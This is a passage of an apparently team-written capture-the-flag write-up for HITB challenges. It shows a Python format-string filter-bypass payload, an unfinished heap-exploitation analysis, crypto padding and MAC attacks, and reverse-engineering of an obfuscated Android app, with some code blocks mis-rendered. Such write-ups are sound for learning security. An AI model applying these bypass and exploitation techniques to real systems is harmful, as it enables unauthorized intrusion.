        <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-symbol">'UOTp</span>%I()&lt;&gt;S':
            <span class="hljs-keyword">if</span> i <span class="hljs-keyword">in</span> secret:
                <span class="hljs-keyword">return</span> <span class="hljs-symbol">'Hacker</span>'
        secret = secret.format(<span class="hljs-string">""</span>)
    except:
        <span class="hljs-keyword">return</span> <span class="hljs-symbol">'Input</span> Error'
    ret = getb(session).flypig(secret,useflypig) <span class="hljs-keyword">if</span> secret <span class="hljs-keyword">else</span> <span class="hljs-string">"No Secret"</span>
    <span class="hljs-keyword">if</span> ret == <span class="hljs-symbol">'Time</span> <span class="hljs-keyword">Out</span>':
        logout()
        <span class="hljs-keyword">return</span> ret
    <span class="hljs-keyword">else</span>:
        <span class="hljs-keyword">return</span> ret</code></pre><p>And from the binary, there is a <code>flypig()</code> function:</p>
<pre class="hljs"><code><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">flypig</span><span class="hljs-params">()</span> </span>{
    <span class="hljs-built_in">puts</span>(<span class="hljs-string">"secret:"</span>);
    read_n_input(s1, <span class="hljs-number">9</span>);
    <span class="hljs-keyword">if</span> ( unk_203090 || <span class="hljs-built_in">strncmp</span>(s1, <span class="hljs-string">"UOTp%I&lt;S"</span>, <span class="hljs-number">8u</span>LL) )
    {
        <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Error_4"</span>);
    }
    <span class="hljs-keyword">else</span>
    {
        unk_203088 = <span class="hljs-built_in">malloc</span>(<span class="hljs-number">0x70</span>uLL);
        unk_203090 = <span class="hljs-number">1</span>;
        <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Success"</span>);
    }
}</code></pre><p>Obviously, the <code>secret</code> code is <code>UOTp%I&lt;S</code>.
However, the webserver filtered all these characters, which means you can&#39;t use this function at all! (really?)</p>
<h4 id="python-format-string-vulnerability"><a class="header-link" href="#python-format-string-vulnerability"></a>Python Format String Vulnerability</h4>
<p>I was wondering why <code>secret = secret.format(&quot;&quot;)</code> is in the code, so I try to Google it and I found <a href="http://lucumr.pocoo.org/2016/12/29/careful-with-str-format/">http://lucumr.pocoo.org/2016/12/29/careful-with-str-format/</a> about danger of Python Format String function, pretty interesting...
The idea is, we can use the attribute of python <code>str</code> and also the format string feature to create the <code>secret</code> code.</p>
<pre class="hljs"><code><span class="hljs-meta">&gt;&gt;</span>&gt; dir(<span class="hljs-string">''</span>)
[<span class="hljs-string">'__add__'</span>, <span class="hljs-string">'__class__'</span>, <span class="hljs-string">'__contains__'</span>, <span class="hljs-string">'__delattr__'</span>, <span class="hljs-string">'__doc__'</span>, <span class="hljs-string">'__eq__'</span>, <span class="hljs-string">'__format__'</span>, <span class="hljs-string">'__ge__'</span>, <span class="hljs-string">'__getattribute__'</span>, <span class="hljs-string">'__getitem__'</span>, <span class="hljs-string">'__getnewargs__'</span>, <span class="hljs-string">'__getslice__'</span>, <span class="hljs-string">'__gt__'</span>, <span class="hljs-string">'__hash__'</span>, <span class="hljs-string">'__init__'</span>, <span class="hljs-string">'__le__'</span>, <span class="hljs-string">'__len__'</span>, <span class="hljs-string">'__lt__'</span>, <span class="hljs-string">'__mod__'</span>, <span class="hljs-string">'__mul__'</span>, <span class="hljs-string">'__ne__'</span>, <span class="hljs-string">'__new__'</span>, <span class="hljs-string">'__reduce__'</span>, <span class="hljs-string">'__reduce_ex__'</span>, <span class="hljs-string">'__repr__'</span>, <span class="hljs-string">'__rmod__'</span>, <span class="hljs-string">'__rmul__'</span>, <span class="hljs-string">'__setattr__'</span>, <span class="hljs-string">'__sizeof__'</span>, <span class="hljs-string">'__str__'</span>, <span class="hljs-string">'__subclasshook__'</span>, <span class="hljs-string">'_formatter_field_name_split'</span>, <span class="hljs-string">'_formatter_parser'</span>, <span class="hljs-string">'capitalize'</span>, <span class="hljs-string">'center'</span>, <span class="hljs-string">'count'</span>, <span class="hljs-string">'decode'</span>, <span class="hljs-string">'encode'</span>, <span class="hljs-string">'endswith'</span>, <span class="hljs-string">'expandtabs'</span>, <span class="hljs-string">'find'</span>, <span class="hljs-string">'format'</span>, <span class="hljs-string">'index'</span>, <span class="hljs-string">'isalnum'</span>, <span class="hljs-string">'isalpha'</span>, <span class="hljs-string">'isdigit'</span>, <span class="hljs-string">'islower'</span>, <span class="hljs-string">'isspace'</span>, <span class="hljs-string">'istitle'</span>, <span class="hljs-string">'isupper'</span>, <span class="hljs-string">'join'</span>, <span class="hljs-string">'ljust'</span>, <span class="hljs-string">'lower'</span>, <span class="hljs-string">'lstrip'</span>, <span class="hljs-string">'partition'</span>, <span class="hljs-string">'replace'</span>, <span class="hljs-string">'rfind'</span>, <span class="hljs-string">'rindex'</span>, <span class="hljs-string">'rjust'</span>, <span class="hljs-string">'rpartition'</span>, <span class="hljs-string">'rsplit'</span>, <span class="hljs-string">'rstrip'</span>, <span class="hljs-string">'split'</span>, <span class="hljs-string">'splitlines'</span>, <span class="hljs-string">'startswith'</span>, <span class="hljs-string">'strip'</span>, <span class="hljs-string">'swapcase'</span>, <span class="hljs-string">'title'</span>, <span class="hljs-string">'translate'</span>, <span class="hljs-string">'upper'</span>, <span class="hljs-string">'zfill'</span>]

<span class="hljs-meta">&gt;&gt;</span>&gt; <span class="hljs-string">''</span>.__doc_<span class="hljs-number">_</span>
<span class="hljs-string">"str(object='') -&gt; string\n\nReturn a nice string representation of the object.\nIf the argument is a string, the return value is the same object."</span>

<span class="hljs-meta">&gt;&gt;</span>&gt; <span class="hljs-string">''</span>.__doc_<span class="hljs-number">_</span>[<span class="hljs-number">77</span>]
<span class="hljs-string">'I'</span></code></pre><p>Basically all the attribute itself has <code>__doc__</code>, so try to find every characters you need from <code>str</code> attributes.</p>
<pre class="hljs"><code>&gt;&gt;&gt; secret = '{<span class="hljs-number">0.</span>__getslice__.__doc__[<span class="hljs-number">56</span>]}{<span class="hljs-number">0.</span>count.__doc__[<span class="hljs-number">128</span>]}{<span class="hljs-number">0.</span>__new__.__doc__[<span class="hljs-number">0</span>]}{<span class="hljs-number">0.</span>count.__doc__[<span class="hljs-number">129</span>]}{<span class="hljs-number">0.</span>__mod__.__doc__[<span class="hljs-number">19</span>]}{<span class="hljs-number">0.</span>__class__.__doc__[<span class="hljs-number">77</span>]}{<span class="hljs-number">0.</span>__le__.__doc__[<span class="hljs-number">12</span>]}{<span class="hljs-number">0.</span>count.__doc__[<span class="hljs-number">0</span>]}'
&gt;&gt;&gt; secret.format('')
'UOTp%I&lt;S'</code></pre><p>Payload: <code>{0.__getslice__.__doc__[56]}{0.count.__doc__[128]}{0.__new__.__doc__[0]}{0.count.__doc__[129]}{0.__mod__.__doc__[19]}{0.__class__.__doc__[77]}{0.__le__.__doc__[12]}{0.count.__doc__[0]}</code></p>
<h4 id="second-stage-(pwn)"><a class="header-link" href="#second-stage-(pwn)"></a>Second stage (Pwn)</h4>
<pre class="hljs"><code><span class="hljs-symbol">    Arch:</span>     amd64<span class="hljs-number">-64</span>-little
<span class="hljs-symbol">    RELRO:</span>    Full RELRO
<span class="hljs-symbol">    Stack:</span>    Canary found
<span class="hljs-symbol">    NX:</span>       NX enabled
<span class="hljs-symbol">    PIE:</span>      PIE enabled</code></pre><p>There are 5 functions:</p>
<ol class="list">
<li>Add a pig (<code>malloc(0xc8)</code>, max=3)</li>
<li>Free a pig (<code>free(pig)</code>, and set pointer to <code>&#39;\0&#39;</code>)</li>
<li>Get pigs (Print out the info of all pigs)</li>
<li>Flypig (A special pig that need a <code>secret</code> code, <code>malloc(0x70)</code>, can only use once, cannot be freed)</li>
<li>Flying (Give &quot;Flypig&quot; 16 bytes data, can only use once)</li>
</ol>
<p>The structure of a normal pig:</p>
<pre class="hljs"><code><span class="hljs-code">+----------------+</span>----------------+ &lt;- current
<span class="hljs-section">|                |   size(0xd0)   |
+----------------+----------------+</span>
<span class="hljs-section">|    pig_name    |    (unused)    |
+----------------+----------------+</span>
|                                 |
|           data (0xb8)           |
|                                 |
|                <span class="hljs-code">+----------------+</span> &lt;- next 
<span class="hljs-section">|                | topchunk_size  |
+----------------+----------------+</span></code></pre><h4 id="vulnerability-3"><a class="header-link" href="#vulnerability-3"></a>Vulnerability</h4>
<ul class="list">
<li><p>one-byte-off</p>
<pre class="hljs"><code><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">read_input</span><span class="hljs-params">(<span class="hljs-keyword">char</span>* buf, <span class="hljs-keyword">int</span> num)</span> </span>{
  v3 = read(<span class="hljs-number">0</span>, buf, num);
  <span class="hljs-keyword">if</span> ( v3 &lt;= <span class="hljs-number">0</span> )
  {
      <span class="hljs-built_in">puts</span>(<span class="hljs-string">"Error_0"</span>);
      <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);
  }
  <span class="hljs-keyword">if</span> ( buf[v3 - <span class="hljs-number">1</span>] == <span class="hljs-string">'\n'</span> )
      buf[v3 - <span class="hljs-number">1</span>] = <span class="hljs-string">'\0'</span>;
  <span class="hljs-keyword">else</span>
      buf[v3] = <span class="hljs-string">'\0'</span>;
}</code></pre><p>From the read_input function, if we read <code>num</code> chars, then it will trigger one-byte-off vulnerability. Basically we can use this to overwite <code>topchunk</code> size (as the hint said).</p>
</li>
<li><p>Flying pig (overwrite next chunk first 16 bytes data)
<code>`</code>C
void flypig() {
  ...
  flypig_addr = malloc(0x70);
  ...
}</p>
</li>
</ul>
<p>void flying() {
    ...
    read_input((char *)(flypig_addr + 0x80), 16);
    ...
}</p>
<pre class="hljs"><code>Just <span class="hljs-keyword">as</span> <span class="hljs-keyword">the</span> pig's <span class="hljs-built_in">name</span>, this pig can <span class="hljs-string">"fly"</span> <span class="hljs-keyword">to</span> next chunk <span class="hljs-keyword">and</span> overwrite <span class="hljs-keyword">first</span> <span class="hljs-number">16</span> bytes (<span class="hljs-number">17</span> <span class="hljs-keyword">if</span> one-byte-off) <span class="hljs-keyword">of</span> <span class="hljs-keyword">the</span> data. Can use this <span class="hljs-keyword">to</span> overwrite freed `fd` <span class="hljs-keyword">and</span> `bk`.
</code></pre><p>+----------------+----------------+ &lt;- flypig
|                |   size(0x80)   |
+----------------+----------------+
|                                 |
|        unused data (0x70)       |
|                                 |
+----------------+----------------+ &lt;- freed chunk 
|                |      size      |
+----------------+----------------+ &lt;- flying() input
|       fd       |       bk       |
+----------------+----------------+</p>
<pre class="hljs"><code>
<span class="hljs-meta">#### Solution...?</span>

* Leak libc address

There are <span class="hljs-number">3</span> different pigs `Ke Gua`, `Red Boy`, `Small Li`.
The `addpig()` <span class="hljs-keyword">function</span> will use `strncpy(buf, pig_name, pig_name_len)` <span class="hljs-keyword">to</span> copy pig<span class="hljs-comment">'s name to `pig_name`.</span>
Notice that `Small Li` <span class="hljs-keyword">is</span> <span class="hljs-number">8</span> bytes, so <span class="hljs-keyword">if</span> we add this pig, we can leak the freed chunk `bk` pointer <span class="hljs-keyword">as</span> no null <span class="hljs-built_in">byte</span> will append after calling `strncpy`, <span class="hljs-keyword">then</span> we can calculate libc address.

* Leak heap address

<span class="hljs-keyword">Using</span> the one-<span class="hljs-built_in">byte</span>-<span class="hljs-keyword">off</span> vulnerability, we can overwrite the `top_chunk` size <span class="hljs-keyword">and</span> caused `sysmalloc` <span class="hljs-keyword">to</span> create a <span class="hljs-keyword">new</span> heap.
<span class="hljs-keyword">Then</span> use the same method above <span class="hljs-keyword">to</span> leak heap address.

* ...

I was unable <span class="hljs-keyword">to</span> solve this challenge <span class="hljs-keyword">in</span> time <span class="hljs-keyword">as</span> I couldn<span class="hljs-comment">'t find a way to exploit. So close....</span>

<span class="hljs-meta">## crypto</span>

<span class="hljs-meta">### easy\_block (sasdf)</span>
<span class="hljs-meta">#### Vulnerability</span>
* We have a service <span class="hljs-keyword">to</span> compute mac <span class="hljs-keyword">for</span> any plaintext.
    ```python
    <span class="hljs-meta"># must be delete!</span>
    elif choice[<span class="hljs-number">0</span>] == <span class="hljs-comment">'c':</span>
        un = input(<span class="hljs-comment">'your username:&gt;&gt;')</span>
        un = bytes(un, <span class="hljs-comment">'ISO-8859-1')</span>
        print(sha256(mac_key + un).digest().hex())</code></pre><ul class="list">
<li>Unpad function doesn&#39;t check for valid padding that can trim more than 16 bytes.<pre class="hljs"><code>  <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">unpad</span><span class="hljs-params">(s)</span>:</span>
      <span class="hljs-keyword">return</span> s[<span class="hljs-number">0</span>:-s[<span class="hljs-number">-1</span>]]</code></pre></li>
<li>Leak 17 bytes of decrypted message.<pre class="hljs"><code>  sha256(mac_key + plaintext).digest().hex()[<span class="hljs-number">-64</span>:<span class="hljs-number">-30</span>]</code></pre></li>
<li>It check last 31.5 bytes of mac instead of whole string<pre class="hljs"><code>  sha256(mac_key + plaintext).digest().hex()[<span class="hljs-number">-63</span>:] == hash.hex()[<span class="hljs-number">-63</span>:]</code></pre></li>
</ul>
<h4 id="construct-payload"><a class="header-link" href="#construct-payload"></a>Construct payload</h4>
<p>Send <code>admin</code> as username, and we will get encrypted data of <code>adminuser</code>, modify the padding and trim off the suffix <code>user</code>. Use second and third blocks to construct a (48 - 5) bytes padding to avoid being affected by initial vector.</p>
<h4 id="construct-hash"><a class="header-link" href="#construct-hash"></a>Construct hash</h4>
<p>Use subroutine <code>c</code> to compute target hash. The initial vector is shared between payload and hash, we cannot modify the first 5 bytes because it will change our plaintext. Fortunately, padded message of hash is (32 + 16) bytes, and only last 31.5 bytes after unpad will be verified. So we can use ciphertext of <code>[5 bytes garbage][32 bytes hash]</code> as our mac, left first 5 bytes of initial vector unchanged. The ciphertext is constructed by xor previous block with desired plaintext and decrypted plaintext.</p>
<h3 id="easy\_pub-(sasdf)"><a class="header-link" href="#easy\_pub-(sasdf)"></a>easy_pub (sasdf)</h3>
<pre class="hljs"><code>bytes_to_long(<span class="hljs-string">b'\x00\xff'</span>) == bytes_to_long(<span class="hljs-string">b'\xff'</span>) == <span class="hljs-number">255</span>
long_to_bytes(bytes_to_long(<span class="hljs-string">b'\x00\xff'</span>)) == <span class="hljs-string">b'\xff'</span></code></pre><p>If we register with empty username, it will give us secret <code>admin_k</code> when we login. DONE.</p>
<h3 id="streamgamex-(sasdf)"><a class="header-link" href="#streamgamex-(sasdf)"></a>streamgamex (sasdf)</h3>
<p>Use first 24 bits of output as state. Run in reverse direction to get lower 24 bits of initial state (i.e. flag). Bruteforce first 17 bits that satisfy sha256 given in hint.</p>
<pre class="hljs"><code>mask = <span class="hljs-number">0b10110110110011010111001101011010101011011</span>
<span class="hljs-keyword">for</span> _ <span class="hljs-keyword">in</span> range(<span class="hljs-number">24</span>):
    lastbit = state &amp; <span class="hljs-number">1</span>
    state &gt;&gt;= <span class="hljs-number">1</span>
    i = (state &amp; mask)
    <span class="hljs-keyword">while</span> i!=<span class="hljs-number">0</span>:
        lastbit^=(i&amp;<span class="hljs-number">1</span>)
        i=i&gt;&gt;<span class="hljs-number">1</span>
    state|=(lastbit&lt;&lt;<span class="hljs-number">23</span>)
    print(<span class="hljs-string">'State: %s'</span> % bin(state)[<span class="hljs-number">2</span>:].rjust(<span class="hljs-number">24</span>, <span class="hljs-string">'0'</span>))
state = bin(state)[<span class="hljs-number">2</span>:].rjust(<span class="hljs-number">24</span>, <span class="hljs-string">'0'</span>)</code></pre><h3 id="base-(how2hack)"><a class="header-link" href="#base-(how2hack)"></a>base (how2hack)</h3>
<p>This challenge let user input one string and output the &quot;encoded&quot; string.
Our goal is to decode the given string, which is the flag: <code>2SiG5c9KCepoPA3iCyLHPRJ25uuo4AvD2/7yPHj2ReCofS9s47LU39JDRSU=</code></p>
<p>From the challenge name, I quickly think of base64 and other similar encoding algorithm. However I can&#39;t really tell how it works as it encodes the string totally different as the usual one.</p>
<p>I try to spam some string and see what I can get, and I think Brute Forcing may help.</p>
<p>Note: I try to scan through all the ASCII (256 possibilities), but after some tries I noted that the flag is only contains hex (16 possibilities).</p>
<p>Here is the script how I attempt to brute force:</p>
<pre class="hljs"><code>flag = <span class="hljs-string">'2SiG5c9KCepoPA3iCyLHPRJ25uuo4AvD2/7yPHj2ReCofS9s47LU39JDRSU='</span>
possibilities = range(<span class="hljs-number">0x30</span>, <span class="hljs-number">0x3a</span>)          <span class="hljs-comment"># 0-9</span>
possibilities.extend(range(<span class="hljs-number">0x61</span>, <span class="hljs-number">0x67</span>))    <span class="hljs-comment"># a-f</span>
choose = <span class="hljs-string">''</span>
<span class="hljs-keyword">while</span> <span class="hljs-keyword">True</span>:
    <span class="hljs-keyword">print</span> flag
    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> possibilities:
        r.sendline(choose+chr(i))
        <span class="hljs-keyword">print</span> r.recvline().strip()
    choose = raw_input().strip()</code></pre><p>Flag: <code>HITB{5869616f6d6f40466c61707079506967}</code></p>
<pre class="hljs"><code><span class="hljs-meta">&gt;&gt;</span>&gt; <span class="hljs-string">'5869616f6d6f40466c61707079506967'</span>.decode(<span class="hljs-string">'hex'</span>)
<span class="hljs-string">'Xiaomo@FlappyPig'</span></code></pre><p>Hi Xiaomo :)...</p>
<h2 id="mobile"><a class="header-link" href="#mobile"></a>mobile</h2>
<h3 id="kivy-simple-(sces60107)"><a class="header-link" href="#kivy-simple-(sces60107)"></a>kivy simple (sces60107)</h3>
<p>First I extract the <code>classes.dex</code> and try analyse the code.</p>
<p>Eventually I found that this apk is using python.</p>
<p>The python script is hidden in the <code>private.mp3</code></p>
<p>Though the scripts is compiled, you can use <code>uncompyle2</code>.</p>
<p>Now we have the main.py</p>
<pre class="hljs"><code><span class="hljs-keyword">from</span> kivy.uix.popup <span class="hljs-keyword">import</span> Popup
<span class="hljs-keyword">from</span> kivy.app <span class="hljs-keyword">import</span> App
<span class="hljs-keyword">from</span> kivy.uix.label <span class="hljs-keyword">import</span> Label
<span class="hljs-keyword">from</span> kivy.uix.textinput <span class="hljs-keyword">import</span> TextInput
<span class="hljs-keyword">from</span> kivy.uix.button <span class="hljs-keyword">import</span> Button
<span class="hljs-keyword">from</span> kivy.uix.boxlayout <span class="hljs-keyword">import</span> BoxLayout
<span class="hljs-keyword">import</span> binascii
<span class="hljs-keyword">import</span> marshal
<span class="hljs-keyword">import</span> zlib

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">LoginScreen</span><span class="hljs-params">(BoxLayout)</span>:</span>

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">__init__</span><span class="hljs-params">(self, **kwargs)</span>:</span>
        super(LoginScreen, self).__init__(**kwargs)
        self.orientation = <span class="hljs-string">'vertical'</span>
        self.add_widget(Label(text=<span class="hljs-string">'FLAG'</span>))
        self.flag = TextInput(hint_text=<span class="hljs-string">'FLAG HERE'</span>, multiline=<span class="hljs-keyword">False</span>)
        self.add_widget(self.flag)
        self.hello = Button(text=<span class="hljs-string">'CHECK'</span>)
        self.hello.bind(on_press=self.auth)
        self.add_widget(self.hello)

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">check</span><span class="hljs-params">(self)</span>:</span>
        <span class="hljs-keyword">if</span> self.flag.text == <span class="hljs-string">'HITB{this_is_not_flag}'</span>:
            <span class="hljs-keyword">return</span> <span class="hljs-keyword">True</span>
        <span class="hljs-keyword">return</span> <span class="hljs-keyword">False</span>

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">auth</span><span class="hljs-params">(self, instance)</span>:</span>
        <span class="hljs-keyword">if</span> self.check():
            s = <span class="hljs-string">'Congratulations you got the flag'</span>
        <span class="hljs-keyword">else</span>:
            s = <span class="hljs-string">'Wrong answer'</span>
        popup = Popup(title=<span class="hljs-string">'result'</span>, content=Label(text=s), auto_dismiss=<span class="hljs-keyword">True</span>)
        popup.open()


screen = LoginScreen()
b64 = <span class="hljs-string">'eJzF1MtOE2EUB/DzTculUKAUKJSr3OqIV0TBGEOMRqIuatJhowsndTrVA+MlnYEYhZXEhQuXLlz4CC58BBc+ggsfwYWPYDznhHN8BJr5Tv7fby6Z8/VrIzj+eDRu0kirVFoARwCPAGI6HOx4EBI6CHy+LHLH1/O4zfd8onQAsEOHg0MHmQcHDt45vmc3B50FyHIQELU8qLZyYutmebIusftm3WQ9Yo/NeskKYh2zPrJ+sfdmRbIBsc9mg2RDYl/NSmTDYt/NymQjYj/NRsnGxH6bVcjGxf6aTZBVxcpObdL6rZlNkU2LXTebsT7qZrP2fk/M5shOie2bzdvzPpgtkC2KfTFbIlsW+2ZWIzst9sPMJzsj9stsheys2B+zc2TnxTxP7YL1UTG7aLZidolsVWzT7LL11jBbI7si1ja7SrYu9sZsw+yjWJaHgHZx4F+j/VnHOao4TCXjvbuBQxqXsV9jgDmNt7CiMURP4zZOaXyA3RrncVTjEpY0djCv8S2Oa3yF/OtC0PldLPN8hkuf4ioO8nxA5zWc1LiITuM97NG4hbMaD3FE4z4W+TEFLhOKD7GL59M6r+OYxjXsperz+YzfvZ00n0rI4tdZxkuTxC8yPr3VTNJYTm139mL5S5BZGidteVTqc4dSMil8V/Qsjnb52vSIzRVdGfKu5E5seHWfu2rw3sj460yjTkwt8oqFYZQ00zQM/3cipSErzQt14/nL1l4Sb0pHXAp3/gENPMQt'</span>
eval(marshal.loads(zlib.decompress(binascii.a2b_base64(b64))))

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">MyApp</span><span class="hljs-params">(App)</span>:</span>

    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">build</span><span class="hljs-params">(self)</span>:</span>
        <span class="hljs-keyword">return</span> screen


app = MyApp()
app.run()
</code></pre><p>There is a second stage. But it is not difficult to understand.</p>
<p>The following is the script to extract flag</p>
<pre class="hljs"><code><span class="hljs-built_in">import</span> zlib
<span class="hljs-built_in">import</span> marshal
<span class="hljs-built_in">import</span> dis
<span class="hljs-attr">b64</span> = 'eJzF1MtOE2EUB/DzTculUKAUKJSr3OqIV0TBGEOMRqIuatJhowsndTrVA+MlnYEYhZXEhQuXLlz4CC58BBc+ggsfwYWPYDznhHN8BJr5Tv7fby6Z8/VrIzj+eDRu0kirVFoARwCPAGI6HOx4EBI6CHy+LHLH1/O4zfd8onQAsEOHg0MHmQcHDt45vmc3B50FyHIQELU8qLZyYutmebIusftm3WQ9Yo/NeskKYh2zPrJ+sfdmRbIBsc9mg2RDYl/NSmTDYt/NymQjYj/NRsnGxH6bVcjGxf6aTZBVxcpObdL6rZlNkU2LXTebsT7qZrP2fk/M5shOie2bzdvzPpgtkC2KfTFbIlsW+<span class="hljs-number">2</span>ZWIzst9sPMJzsj9stsheys2B+zc2TnxTxP7YL1UTG7aLZidolsVWzT7LL11jBbI7si1ja7SrYu9sZsw+yjWJaHgHZx4F+j/VnHOao4TCXjvbuBQxqXsV9jgDmNt7CiMURP4zZOaXyA3RrncVTjEpY0djCv8S2Oa3yF/OtC0PldLPN8hkuf4ioO8nxA5zWc1LiITuM97NG4hbMaD3FE4z4W+TEFLhOKD7GL59M6r+OYxjXsperz+YzfvZ00n0rI4tdZxkuTxC8yPr3VTNJYTm139mL5S5BZGidteVTqc4dSMil8V/Qsjnb52vSIzRVdGfKu5E5seHWfu2rw3sj460yjTkwt8oqFYZQ00zQM/<span class="hljs-number">3</span>cipSErzQt14/nL1l4Sb0pHXAp3/gENPMQt'
<span class="hljs-attr">a=marshal.loads(zlib.decompress((b64).decode("base64")))</span>

<span class="hljs-attr">flag=["?"]*50</span>                     <span class="hljs-comment"># initialize flag string</span>
<span class="hljs-attr">n=a.co_consts[0].co_consts</span>        <span class="hljs-comment"># the const contains flag byte and index byte</span>
<span class="hljs-attr">code=a.co_consts[0].co_code[34:]</span>  <span class="hljs-comment"># extract useful bytecode</span>

<span class="hljs-comment"># Now we can reconstruct the flag</span>
while code.find(<span class="hljs-string">"|\x01\x00d"</span>)!=-<span class="hljs-number">1</span>:
  <span class="hljs-attr">pos=code.find("|\x01\x00d")</span>
  <span class="hljs-attr">code=code[pos:]</span>
  <span class="hljs-attr">i=ord(code[4])</span>
  <span class="hljs-attr">j=ord(code[8])</span>
  <span class="hljs-comment">#the first is index, the second is flag</span>
  flag[n[i]]=n[j]
  <span class="hljs-attr">code=code[1:]</span>
print <span class="hljs-string">""</span>.join(flag)
</code></pre><p>The flag is <code>HITB{1!F3_1S_&amp;H%r7_v$3_pY7#ON!}</code></p>
<h3 id="multicheck-(sasdf)"><a class="header-link" href="#multicheck-(sasdf)"></a>multicheck (sasdf)</h3>
<p>Extract <code>claz.dex</code> from <code>lib/libcheck.so</code> by xor with increasing byte stream started with 233 (i.e. i=233; i++). Run the inverse of algorithm in <code>claz.dex</code> to uncover input string.</p>
<pre class="hljs"><code><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">decBlock</span><span class="hljs-params">(a, b)</span>:</span>
    i5 = np.int32(<span class="hljs-number">0</span>)
    <span class="hljs-keyword">for</span> _ <span class="hljs-keyword">in</span> range(<span class="hljs-number">32</span>):
        i5 -= np.int32(<span class="hljs-number">1640531527</span>)
    <span class="hljs-keyword">for</span> _ <span class="hljs-keyword">in</span> range(<span class="hljs-number">32</span>):
        b -= (((a &lt;&lt; np.int32(<span class="hljs-number">4</span>)) + coeff[<span class="hljs-number">2</span>]) ^ (a + i5)) ^ ((a &gt;&gt; np.int32(<span class="hljs-number">5</span>)) + coeff[<span class="hljs-number">3</span>])
        a -= (((b &lt;&lt; np.int32(<span class="hljs-number">4</span>)) + coeff[<span class="hljs-number">0</span>]) ^ (b + i5)) ^ ((b &gt;&gt; np.int32(<span class="hljs-number">5</span>)) + coeff[<span class="hljs-number">1</span>])
        i5 += np.int32(<span class="hljs-number">1640531527</span>)
    <span class="hljs-keyword">return</span> int(a), int(b)</code></pre>        </article>
      </div>
    </div>
  </body>
</html>
